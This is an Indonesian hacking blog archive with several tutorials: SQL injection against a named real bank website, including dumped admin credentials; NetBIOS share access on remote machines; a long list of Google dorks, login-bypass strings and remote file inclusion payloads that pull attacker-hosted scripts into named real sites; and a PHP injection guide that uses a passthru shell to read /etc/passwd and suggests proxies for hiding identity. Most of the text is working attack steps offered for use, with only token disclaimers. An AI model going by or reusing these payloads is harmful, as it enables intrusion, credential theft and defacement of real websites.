Jumat, 03 Desember 2010

Hack Website menggunakan SQL injection

Hack Website menggunakan SQL injection

Hai teman teman berikut ini adalah cara Web attack (hack website) menggunakan cara SQL injection. Ok langsung saja bisa kamu lihat di bawah ini :

1. Menemukan target

Kita dapat menemukan calon korban dengan bantuan search engine (Google masih yang terbaik) dengan memanfaatkan pola-pola tertentu. Pola-pola inilah yang disebut dengan Dork. Dork yang kita gunakan adalah untuk mencari pola yang berhubungan dengan SQL (Database) maka dork ini sering juga disebut dengan SQL Dork.

N0LDR
“Hal di atas merupakan alasan kuat bagi Admin untuk selalu update dengan isu keamanan karena kita bias saja menjadi korban walaupun kita tidak memiliki musuh. Dengan masuk ke daftar hasil pencarian maka kita telah menjadi calon korban”

Perlu diketahui, dengan dork yang sama belum tentu kita mendapatkan calon korban yang sama ! Untuk tutorial ini, saya menggunakan Dork (Google bisa lebih banyak memberikan SQL Dork kepada anda dari pada diri saya sendiri ):

Dork-Dork bisa kamu lihat disini Kumpulan Dork SQL Injection Update 2010

Dari sekian banyak calon korban, maka:
http://www.bankpapua.com/kantor.php?jenis=2
merupakan target saya pada tutorial sederhana ini.

N0LDR
“Target sengaja tidak saya sensor agar PoC (Proof of Concept) pada tutorial ini jelas. Kepada para pembaca saya harapkan untuk tidak melakukan tindakan pengerusakan di kemudain hari pada web site ini. Ingat, dengan melakukan pengerusakan berarti anda membunuh karier terhormat anda di masa depan. Pergunakanlah sebatas pembelajaran”


2. Mencari celah kelemahan

Pengujian apakah calon korban memiliki kelemahan SQL atau tidak. Kita dapat menambahkan karakter minus (-) atau petik tunggal (‘) [tergantung pada sistem (- atau ‘)]pada query yang ada. Jika kita mendapatkan error berarti calon korban memiliki kelemahan terlepas dari bisa di injeksi lebih lanjut atau tidak.

(-) ditambahkan sebelum item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=-2
(‘) ditambahkan sesudah item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=2’

Pada tutorial ini, teknik kedua yang memunculkan error! (berarti web site target memiliki kelemahan SQL Injection. Error yang kita dapatkan adalah:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118


3. Mendapatkan jumlah kolom

Tahap selanjutnya adalah mendapatkan jumlah kolom pada tabel aktif. Tekniknya adalah dengan menggunkan perintah order by sebagai berikut:

http://www.bankpapua.com/kantor.php?jenis=2+order+by+1--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+2--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+3--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+4--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+5--
.
.
.
Kita lakukan pengujian satu persatu (boleh dilompat) hingga kita mendapatkan error yang berarti jumlah kolom terakhir (yang tidak error) merupakan jumlah kolom pada tabel aktif. Pada tutorial ini, kita mendapatkan error pada pengujian ke-6.

http://www.bankpapua.com/kantor.php?jenis=2+order+by+6--

Kita mendapatkan error:


Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118

Berarti jumlah kolom pada tabel aktif adalah 5 (pengujian terakhir yang tidak error)


4. Mendapatkan angka keberuntungan

Angka keberuntungan adalah angka yang dimunculkan oleh sistem yaitu angka antara range jumlah kolom aktif (dalam kasus ini 1-5). Perintah yang kita gunakan adalah union select sebagai berikut:


http://www.bankpapua.com/kantor.php?...C2%2C3%2C4%2C5--

[Jangan lupa menambahkan karakter minus (-) pada awal key (pada kasus kita, key adalah 2)]. Kita mendapatkan angka 1,2,3, dan 4. Di angka-angka inilah tempat kita melakukan query.


5. Mendapatkan versi database server

Dapatkan versi server SQL (dalam kasus ini, MySQL) dengan perintah version(), atau @@version. Kita gunakan version() dan kita pilih angka 4:

http://www.bankpapua.com/kantor.php?...%2C3%2Cversion(),5--

Kita mendapatkan 5.0.51a-24+lenny4 yang berarti MySQL versi 5. Kita sedikit beruntung karena menemukan versi 5 jika versi 4 maka tahap berikutnya adalah “Tebak-tebak buah nanas”.


6. Mendapatkan nama tabel

Gunakan perintah group_concat(table_name) dengan penyeleksian dari information_schema.tables sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(table_name),5+from+information_schema.tables+wher e+table_schema=database()--

Kita mendapatkan nama-nama tabel sebagai berikut:
adunasabah,agenda,anual,atm,atmprima,atmsama,berit a,birate,bunga,
galery,kantor,karir,kontak,konter,kurs,lapkeu,link ers,manajemen,pesertaquiz,
polling_d,polling_h,produk,promo,quiz_peserta,quiz _soal,regulasi,tamu,users. Dari sekian banyak kita pilih tabel users namun harus dikonversi ke heksadesimal terlebih dahulu. Silahkan kunjungi:

http://www.dolcevie.com/js/converter.html

kemudian kita mendapatkan (titik dua ( tidak diikutsertakan) users(ascii) -> 7573657273(hex)


7. Mendapatkan nama kolom

Gunakan perintah group_concat(column_name) dengan penyeleksian dari information_schema.columns sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(column_name),5+from+information_schema.columns+wh ere+table_name=0x7573657273--

0x7573657273 kita dapatkan dengan menggabungkan 0x dengan 7573657273 (hasil konversi tadi). Kita mendapatkan nama-nama kolom sebagai berikut:
ids,username,password,fullname,address,a_add,a_edi t,a_del,topadmin,akses. Kita pilih username dan password.


8. Mendapatkan Data

Gunakan perintah group_concat(username,0x3a,password) dengan penyeleksian tabel users tadi sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(username,0x3a,password),5+from+users--

Kita mendapatkan:

webmaster: †¥²¯d”¥´¹¥¥¨±¬²»©¦£vttz
sdm: †¥²¯d”¥´¹¥•¨±uvw
sekper: †¥²¯d”¥´¹¥•©¯´©¶uvw

Terenkripsi Tahap berikutnya adalah mendapatkan plain text dari password yang terenkripsi, google! Setelah dapat, cari halaman admin kemudian login dengan account webmaster, Anda telah berhasil take over http://www.bankpapua.com/

N0LDR
“Tutorial ini hanya sebagai pembelajaran semata. Hacking is good”
sumber : jasakom.com


Artikel Asli Berjudul Hack Website menggunakan SQL injection
di www.perwira28.blogspot.com
Under Creative Commons License: Attribution Non-Commercial

Selasa, 23 Februari 2010

LATIHAN HACK INJEK SQL

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

Nah itu artinya SQL Injection, untuk translate ke bahasa sesuai yg ada mengerti silahkan di translate sendiri. :D.
Ok, SQL Injection itu sendiri dapat terjadi oleh beberapa faktor, di antaranya kesalahan setting pada server yang memungkinkan seorang attacker memasukkan karakter dan baris perintah yg membahayakan bagi program, selain itu juga kesalahan dalam coding yg tidak memfilter karakter yg diinputkan oleh user.

Sudah cukup basa basinya.. sekarang sedikit tutorialnya.. :D.
Pertama., carilah sasaran yang mau di injek - injek SQL nya.. Lha nyarinya dimana mas?? tanya lah pada rumput yg bergoyang dombret nyarinya… wjwkwkwkwk.. Nyari di google, misal’e dengan kata kunci

inurl:news.php?id= site:com

Nah.. buanyak bgt kan hasilnya…. sekarang tinggal kita coba satu buat test..
Misal kita menemukan sebuah site dengan alamat sebagai berikut….

http://www.target.com/english/news.php?id=64

Tahap selanjutnya mari kita tambahkan tanda petik (’) diakhir angka 64.. Ups… ternyata muncul kek gini..

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

Mungkin pada nanya.. mangnya kenapa kalo muncul kek gitu mas..?? Ya itu tandanya error kawand… dah nemu yg asyik error nya.. mari kita lanjutkan ketahap berikutnya.., Ilangkan saja tanda ‘ nya, ganti dengan tanda - (minus) jadi seperti berikut

http://www.target.com/english/news.php?id=-64+order+by+100–
Keterangan : angka 100 itu untuk mencari field nya, tanda minus double di belakang digunakan untuk memberikan Comment pada Mysql Query sehingga sistem tidak akan menjalankan perintah selanjutnya.

setelah ditulis kek gitu… ternyata terdapat error.. like this

Unknown column ‘100' in ‘order clause’

Weeh… Column 100 ndak ada katanya… kita perkecil lagi… coba angka angka misal 10,9 dll ok. Sampai dia tidak memunculkan error unknown column tadi… Setelah di dapat angka yang tidak memunculkan error trus langkah selanjutnya kepriben kiye… (walah boso ngendi maneh.. @_@)…

Buat langkah selanjutnya marih kita select column column tersebut. Lha nyara select nya piye, begini, mari kita coba dengan cara yg sederhana.. misalnya tadi g ada error di coloum 9 so, perintahnya like this

http://www.target.com/english/news.php?id=-64+union+select+1,2,3,4,5,6,7,8,9–

Ok, dah running querynya di address bar, tunggu beberapa saat dan berharaplah akan muncul suatu mukjizat.. wkwkwkwkwkwkw. Nah setelah loading selesai, liad di browser, angka berapa ajah yg muncul… (tempat munculnya di tempat seharusnya artikel ato berita muncul). Misal’e yang muncul tuh angka 3, mari kita explore lebih jauh lagi… kita lihat versi dari databasenya. caranya dengan menjalakan seperti ini

http://www.target.com/english/news.php?id=-64+union+select+1,2,version(),4,5,6,7,8,9–

Nah, setelah itu bakal muncul deh versi dari databasenya, bisa aja versinya 5.2, ato 4.0 atau yg lainnya. Setelah dapet versi databasenya, lanjutin deh buat ngedapetin yang namanya table - table nya. Lha caranye gimana Om??? Wes ga usah panjang x lebar, tar jadi luas wkwkwkw… Untuk mysql versi 5, kita bisa manfaatin yang namanya Information_schema, nah kalo versi 4, ya kita hanya bisa berdoa dan berharap alias maen tebak tebakan… wkwkwkwkwkw.

Buat mencari nama table table nya bisa kita lakuin dengan cara seperti ini.

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()–

Query diatas bakal menghasilkan nama nama table yg ada di database sesuai dengan nama database yg di gunakan, dan sudah dech kita tinggal pilih table mana yg bakal kita extract colom2 nya dan buat kita cari isi dari colom2 nya.. :D. . Lha cara mengetahui column nya gmn mas??? Nah lho.. lom taut tho… Ok, buat cari tau nama nama column nya kita butuh bantuin sebuah alat yg gunanya buat meng-convert code ascii ke hexa, gunanya buat mengambil nama column berdasar nama table nya..

Nh tak kasih sekalian website yg nyedian fasilitas buat ngonvert hexa to ascii, bisa di coba di http://centricle.com/tools/ascii-hex/ tinggal kalian masukin nama table dah jadi dech kode ascii nya.. :D dan kita tinggal meng-query buat ngedapetin nama column nya seperti ini

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0xCODEASCITABLE–

Binggo…!!! kita udah ngedapetin nama nama column nya… tinggal deh men-select isinya…

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(nama_column1,0×3a,nama_column2,0×3a,column3),4,5,6,7,8,9+from+nama_tabel–

arti 0×3a : menampilkan karakter : (titik dua).

Dah.. kita dah dapet isi dari table table… tinggal dilanjutin sendiri…

dah selesai ya…

Happi testing esngiel injecktion ya…

MEREMOTE KOMPUTER ORANG

Pernah dengar istilah NetBIOS over TCP/IP?Kalau sudah, sebaiknya lewatkan saja tulisan ini Dan jika belom boleh disimak :)
Tulisan ini tujuan hanya sebagai pembelajaran saja dan agar dapat kita selalu berhati hati. :) Informasi NetBios sebenarnya dapat kita pakai untuk exploitasi sistem lawan dan berikut ini suatu caruntuk exploitasi target yang menggunakan file/printer sharring

Dalam tulisan ini saya asumsikan anda menggunakan win 98
Sebelum kita mulai coba kita find nbtstat.exe
Sebenarnya fungsi file tersebut adalah untuk menampilkan statistik protokol dan koneksi tcp/ip

Langkah langkah exploitasi :)
1. Click Start-->Program-->MS-Dos prompt--> tulis nbtstat lalu enter
2. Click Start-->Run-->tulis nbtstat lalu OK

Kira kira mucul sperti ini :
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S][interval] ]

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh

RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying statistics.

Dari informasi diatas sebenarnya sudah dapat kita ketahui fungsi dari nbtstat.exe

Pada kesempatan ini saya akan coba mengulas 2 option diatas yaitu :
-A
-a

misal kita mau mencoba komputer dengan names belog.wasantara.net.id
maka kita gunakan :
nbtstat -a belog.wasantara.net.id

misal kita mau mencoba komputer dengan ip 192.168.1.1
maka kita gunakan :
nbtstat -A 192.168.1.1

Dari perintah diatas kemungkinan yang muncul adalah :
1. Host not found
2. Dan pesan indah seperti dibawah ini :

--------------------------------------------

NetBIOS Local Name Table

Name Type Status
---------------------------------------------
BELOG <00> UNIQUE Registered
POLOS <00> GROUP Registered
BELOG <03> UNIQUE Registered
BELOG <20> UNIQUE Registered
POLOS <1e> GROUP Registered

---------------------------------------------

Jika muncul pesan Host not found, segera hentikan usaha anda, karena akan buang waktu sia sia :)

Jika muncul pesan indah seperti diatas, sebaiknya anda tarik napas, karena perkerjaan lain akan menunggu.
Dari pesan indah tersebut yang menjadi catatan adalah karakter dengan kode BELOG <20> UNIQUE Registered, karena angka 20 ini adalah informasi file dan printer sharing.

Apa langkah kita selanjutnya ?
Setelah kita mempunyai info diatas, cari file yang bernama :
LMHOST atau HOST (win 9x)

Jika sudah ketemu, buka dengan editor seperti noteped dan tambahkan :
192.168.1.1 BELOG

Kemudian simpan.

Selanjutnya
Click Start-->Find-->Computer
masukan nama atau ipnya

Dan anda pasti akan berteriak girang, karena komputer remote sudah bisa anda jadikan seperti HD secondary anda :)

Selamat :)
nb : sekali lagi, mohon tulisan ini hanya sebagai bahan pembelajaran saja dan bukan digunakan untuk merusak dan dari tulisan ini saya berharap, kita jangan seenaknya membuka file/printer sharing

HACK SITE DENGAN INJEK SQL

Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya uptodate tiap menit bahkan detik siapa tuh yang update yahh para hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN INI.titik

Pembahasan:

------------------------------------------------
keyword:inurl:"/cart.php?m="
contoh:http://www.facesbyfelicia.com/store/cart.php?m=view
ganti tulisn cart.php?m=view dengan admin
jadi http://www.facesbyfelicia.com/store/admin
trus login pake sql username : 'or"=" password :'or"="
------------------------------------------------
keyword inurl:"/modernbill"
contoh:http://billing.ourweb.net/modernbill/
masukin injekannya:include/html/config.php?DIR=http://one-server.us/injek.txt?
jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=http://one-server.us/injek.txt?
------------------------------------------------
keyword:"Powered by SunShop 3.2" atau: inurl:"/sunshop/index.php?action="
contoh http://www.dohertysgym.com/sunshop/index.php
ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin
login pake user: admin pass: 'or''='
------------------------------------------------
inurl:"modules.php?name=SQuery"
injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
contoh:http://www.dies-world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
------------------------------------------------
google:allinurl:com_galleria
injek:components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://one-server.us/item.txt?
contoh:http://www.a1gpracing.net/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt?
------------------------------------------------
google:allinurl:"/auth/lostPassword.php"
contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.php
injek:ldap/authldap.php?includePath=http://one-server.us/item.txt?
jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?includePath=http://one-server.us/item.txt
------------------------------------------------
google:intitle:"Multimedia Flash Website Builder"
contoh:www.webdesignhq.com/sitebuilder/index.php
injek:sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
------------------------------------------------
gogle:"software 2004-2005 by randshop"
contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php?id=20&katid=32&action=detail
injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
------------------------------------------------
keyword;"powered by geeklog"
contoh:http://www.kobe-ch.com/index.php
injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
jadi:http://www.kobe-ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
------------------------------------------------
google:inurl:"/product.php?printable=" atau "powered by x-cart"
inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin
kekekek biasa sqlnya cari sendiri ya
------------------------------------------------
keyword:inurl:"/index. php?option=com_rsgallery"
bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item,txt?
contoh:http://www.pass-my-shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item.txt?
------------------------------------------------
keyword:"Advanced Poll" inurl:/admin/
contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php
bug:common.inc.php?base_path=http://elang13.org/item.txt?
jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php?base_path=http://elang13.org/item.txt?
------------------------------------------------
inurl:"powered by cs-cart"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item/txt?
------------------------------------------------
inurl:"/catalogue.php?cat="
ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak

inurl:"/DoceboScs" injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://elang13.org/hitam.txt?
inurl:"/DoceboCore" injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboLms" injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboKms" injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboCMS" injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"dload.php"
injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt?
------------------------------------------------
"powered by squirrelcart"
injek : squirrelcart/cart_content.php?cart_isp_root=
------------------------------------------------
keyword inurl:/ubbthreads/
injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"index.php?target=categories"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item.txt?
------------------------------------------------
google : "Exhibit Engine 1.5 RC 4"
injek:photo_comment.php?toroot=http://elang13.org/item.txt?
------------------------------------------------
inurl:"/modules/Forums/
injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/item.txt?
------------------------------------------------
allinurl: includes/include_once.php
bug:includes/include_once.php?include_file=http://elang13.org/item.txt?
------------------------------------------------
allinurl:/phplivehelper/blank.php
injek:initiate.php?abs_path=hhttp://elang13.org/item.txt?
------------------------------------------------
google:"powered by DreamAccount"
injeknya:
auth.cookie.inc.php?da_path=http://elang13.org/item.txt?
auth.header.inc.php?da_path=http://elang13.org/item.txt?
auth.sessions.inc.php?da_path=http://elang13.org/item.txt?
------------------------------------------------
ashopKart20/" ganti tulisan yang ada didepannya ama admin/scart.mdb
------------------------------------------------
inurl:"//comersus/" ganti /store/xxxx.asp dengan
database/comersus.mdb
------------------------------------------------
allinurl:/shop/category.asp/catid=
hapus tuisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses ccnya biasayanya di encrypt
http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp
------------------------------------------------
inurl:"/admin/default.asp"
username:admin password:'or''='
span style="color: rgb(51, 51, 255);">------------------------------------------------
inurl:"/metacart/"
injek : database/metacart.mdb
------------------------------------------------
inurl:"/store/proddetail.asp?prod="
ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
------------------------------------------------
inurl:"/AdminLogin.asp"
login pake sql ini :
usename:1'or'1'='1
password:1'or'1'='1
------------------------------------------------
inurl:"com_a6mambocredits"
http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt
------------------------------------------------
"Welcome to phpMyAdmin" inurl:main.php
------------------------------------------------
filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )
------------------------------------------------
inurl:"com_peoplebook"
inurl:"com_comprofiler"

HACK SITE DENGAN PHP INJEK

Php Injection (updated every day)
Pada kesempatan kali ini kita akan membahas mengenai PhpInjection, apa itu PhpInjection? Bagaimana menemukannya dan bagaimana penanganannya.
Pertama kali kita membutuhkan sedikit keahlian yaitu mengenal sedikit tentang apa dan bagaimana itu script php. Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi. Kesemuanya itu sudah terdapat dalam fungsi dari script php ini. Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari.
Disini kita tidak akan membahas mengenai bagaimana melakukan semua itu, karena maaf ini bukan saatnya untuk belajar php tapi saatnya belajar hacking dengan menggunakan kelebihan dari script php dan kelemahan dari webmaster yang menggunakannya. Jadi cukup sudah basa-basinya.
Begitu banyak orang menanyakan bagaimana untuk mencari bugs pada script php yang ada, sebenarnya ilmu ini sudah lama dan tutorial nya juga sudah begitu banyak di tulis oleh berbagai orang pada berbagai website tentang security jaringan dan hacker, baik milik komunitas maupun milik pribadi. Pada kesempatan ini biarlah saya mengulas sedikit dan mengulang kembali tentang injection pada script php yang lebih dikenal dengan nama PhpInjection.

1. Seperti dijelaskan diatas script php banyak memiliki kelebihan dan mudah digunakan. Nah otomatis banyak webmaster yang menggunakan nah otomatis sasaran kita juga semakin banyak (walau untuk sekarang ini hanya sedikit karena webmaster sudah menyadari kekurangannya).
2. Sebelum kita menggunakan ilmu kita dan memulai pencarian kita, jangan lupa selalu siapkan 2 point penting dari semuanya. Apa itu? Tentu saja 'ROKOK' dan 'KOPI'. Nah setelah kita santai dan dapat berkonsentrasi maka kita bisa mulai aksi kita.
3. Pertama kali kita harus mengakui kehebatan dari om 'Google' dari sana lah kita mendapatkan semuanya. Nah untuk menambah kasanah pengetahuan tentang 'Google hack ada baiknya kita membaca buku 'Hack Attack' Cara dan penanggulanganya oleh teman kita dari jasakom.Atau kunjungi saja langsung situs www. jasakom.com.
Nah untuk memulai pencarian kita masukkanlah kata kunci berikut untuk mendapatkan target kita :
Untuk forum :
allinurl:my_egallery site:.org
allinurl:xgallery site:.org
allinurl:coppermine site:.org
allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
allinurl:ihm.php?p=
allinurl:.php?bodyfile=
allinurl:/default.php?page=home
allinurl:/folder.php?id=
allinurl:main.php?pagina=
allinurl:/modules.php?name=allmyguests
allinurl:AshNews atau allinurl: /ashnews.php
allinurl:ihm.php?p=*
allinurl:kietu/hit_js.php
allinurl:/Popper/index.php?
keyword : "Powered by phpBB 2.0.6"
keyword : "powered by CubeCart 3.0.6"
keyword : "powered by paBugs 2.0 Beta 3"
Keyword : "powered by AllMyLinks"
keyword : /phorum/login.php
keyword : "powered eyeOs"
allinurl:/includes/orderSuccess.inc.php?glob=
allinurl:modules.php?name=Forums

Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword.
Kalo memang rajin coba liat ajah listnya di :
-= http://www.geocities.com/kake_rgb/list.txt =-

4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com
atau kalau kamu tidak berhasil coba dengan list berikut :
Ganti modul :

1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath=
2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR
4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=
5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=
8. kietu : kietu/index.php?kietu[url_hit]=
9. "Powered by phpBB 2.0.6" : &highlight=%2527.include($_GET[a]),exit.%2527&a=
10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
11. "powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir=
12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

16 allinurl:modules.php?name=Forums : /modules.php?name=
=============================================================================
http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd?

==========================================================================
5. Kalau kamu bisa melihat web jasakom.com, berarti sasaran sudah ditemukan. Jika belum berarti tutup dan beralih lah pada website berikutnya. Sebagai catatan bahwa untuk sekarang begitu banyak web sudah di patch, so jangan patah semangat dan teruslah berusaha. Dan juga jangan lupa semua orang yang membuka website dapat diketahui ipnya dari log file web server, terutama sekarang banyak web jebakan untuk mencatat ip yang mencoba menyerang, so jangan lupa gunakanlah anonymous proxy ato fake address untuk mengaburkan identitas kamu.

6. Nah klo udah dapet target maka mari kita selanjutnya kita harus cari webhosting gratis. Webhosting ini tidak perlu mendukung php.

Kemudian kita buat file dengan nama test.txt (nama file bebas). Isi file tersebut sebagai berikut:

passthru($test);
?>

simpan file tersebut, lalu upload ke webserver yang telah kita cari sebelumnya.

Sekarang kita siap untuk melakukan aksi kita.
Ketikkan di address bar dari browser kita alamat berikut:

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cal

jika kita berhasil maka kita akan mendapatkan respon sebagai berikut:
June 2004 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30


7. Nah klo kamu mau exploit coba yang satu ini :
http://www.example.com/index.php?module=subjects&func=listpages&subid=[SQL]
http://www.example.com/index.php?module=subjects&func=viewpage&pageid=[SQL]
http://www.example.com/index.php?module=subjects&func=listcat&catid=[SQL]

8. Gimana kalo kita masukkan perintah untuk menampilkan password account di server tersebut??

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cat /etc/passwd

Nah kita bisa dapet dech passwd nya. Hmm setelah dapet passwd ngapain lagi yach ... terserah dech. Tapi jangan lah kasian mending kasih tau admin suruh patch sistem. hehehe

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Selasa, 09 Februari 2010

DEFACE WEBSITE LAGI

Cara Deface Website
Diposkan oleh FatkhanSite's

Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau
merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak
